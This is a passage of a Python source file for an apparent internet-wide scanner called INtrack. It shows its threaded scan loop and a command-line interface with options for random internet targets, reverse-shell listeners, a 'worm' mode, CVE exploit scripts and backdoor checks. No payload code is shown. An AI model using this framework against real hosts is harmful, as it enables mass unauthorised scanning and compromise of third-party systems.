479 |                 found_count += 1
480 |                 if output_file:
481 |                     output_file.write(f"{result}\n")
482 |                     output_file.flush()
483 |         return result
484 | 
485 |     with alive_bar(
486 |         total_ips,
487 |         title="Scanning targets",
488 |         enrich_print=False,
489 |         bar=kwargs['bar_style'],
490 |         stats=True,
491 |         unit=" IPs"
492 |     ) as progress_bar:
493 |         with concurrent.futures.ThreadPoolExecutor(max_workers=kwargs['threads']) as executor:
494 |             list(executor.map(process_and_update, ip_addresses))
495 | 
496 |     print()
497 |     print_colour(f"[+] Scan complete - Found {found_count} targets")
498 |     return found_targets
499 | 
500 | 
501 | 
502 | @click.command(help="INtrack - Internet Crawler (rich_click).")
503 | @click.option("-H", "--host", type=str, help="Specify a single target IP or subnet range of IPs to scan /24, /23, /22, etc.")
504 | @click.option("-f", "--file", "filename", type=str, help="Specify a file containing target IPs.")
505 | @click.option("-n", "--n-targets", "n_targets", type=int, help="Number of targets to find. Can also be used to increase the range of the scan.")
506 | @click.option("-p", "--port", default="80", help="Port(s) to check. Defaults to 80 if not provided.")
507 | @click.option("-t", "--threads", default=25, help="Number of threads to use.")
508 | @click.option("-o", "--output", "output_file", type=str, help="Store results into a file.")
509 | @click.option("-L", "--lhost", type=str, help="Add a listening host for revshells.")
510 | @click.option("-P", "--lport", type=str, help="A listening port for revshells.")
511 | @click.option("--hostname", is_flag=True, help="Resolve hostnames for IP addresses.")
512 | @click.option("-i", "--instance", type=str, help="Type of instance to check.")
513 | @click.option("-b", "--backdoor", type=str, help="Look for backdoor implants.")
514 | @click.option("-w", "--worm", type=str, help="Enable special script execution with a specified type (e.g., 'vscode-sftp').")
515 | @click.option("-v", "--vuln", type=str, help="Enable vuln script execution with a specified type (e.g., CVE-2017-7921).")
516 | @click.option("-e", "--exposure", type=str, help="Used to detect exposure files.")
517 | @click.option("--iot", type=str, help="Used to detect IoT devices.")
518 | @click.option("-m", "--miscellaneous", type=str, help="Used for miscellaneous checks.")
519 | @click.option("--workflows", type=str, help="Run workflow scans on your targets.")
520 | @click.option("-N", "--network", type=str, help="Used for network scans.")
521 | @click.option("--timeout", default=10, help="Timeout seconds for web requests.")
522 | @click.option("--probe", is_flag=True, help="Used for probing hosts for HTTP/HTTPS")
523 | @click.option("-s", "--spider", type=str, help="Specify the subnet range to scan if a result is found (e.g., /20, /24).")
524 | @click.option("--list", "list_flag", is_flag=True, help="List available scanners and checks.")
525 | @click.option("--bar-style", default="smooth", type=click.Choice(["smooth", "blocks", "bubbles", "solid", "classic", "brackets"]), help="Progress bar style (default 'smooth').")
526 | def main(**kwargs):
527 |     ascii_art()
528 | 
529 |     config_handler.set_global(spinner='dots_waves', force_tty=True, dual_line=True)
530 | 
531 |     if kwargs['list_flag']:
532 |         list_scanners()
533 |         sys.exit(0)
534 | 
535 |     if not (kwargs['host'] or kwargs['filename'] or kwargs['n_targets']):
536 |         print_red("You must provide either --host, --f, or --n")
537 |         sys.exit(1)
538 | 
539 |     output_file = open_output_file(kwargs['output_file'])
540 | 
541 |     if kwargs['filename']:
542 |         ip_addresses = read_targets_from_file(kwargs['filename'])
543 |         print_colour(f"[*] Scanning {len(ip_addresses)} targets from file '{kwargs['filename']}'")
544 |         found = handle_known_ips(ip_addresses, kwargs, output_file)
545 | 
546 |     elif kwargs['host']:
547 |         if '/' in kwargs['host']:
548 |             ip_addresses = get_ips_from_subnet(kwargs['host'])
549 |             print_colour(f"[*] Scanning {len(ip_addresses)} targets from subnet '{kwargs['host']}'")
550 |         else:
551 |             ip_addresses = [kwargs['host']]
552 |             print_colour(f"[*] Scanning 1 target: {kwargs['host']}")
553 |         found = handle_known_ips(ip_addresses, kwargs, output_file)
554 | 
555 |     else:
556 |         print_colour(f"[*] Scanning {kwargs['n_targets']} random targets from the internet")
557 |         found = handle_random_scan(kwargs['n_targets'], kwargs, output_file)
558 | 
559 |     print_scan_context(kwargs)
560 | 
561 |     if output_file:
562 |         output_file.close()
563 | 
564 |     for t in found[: kwargs['n_targets']] if kwargs['n_targets'] else found:
565 |         print(t)
566 | 
567 |     return 0
568 | 
569 | if __name__ == "__main__":
570 |     import sys
571 |     sys.exit(main())


--------------------------------------------------------------------------------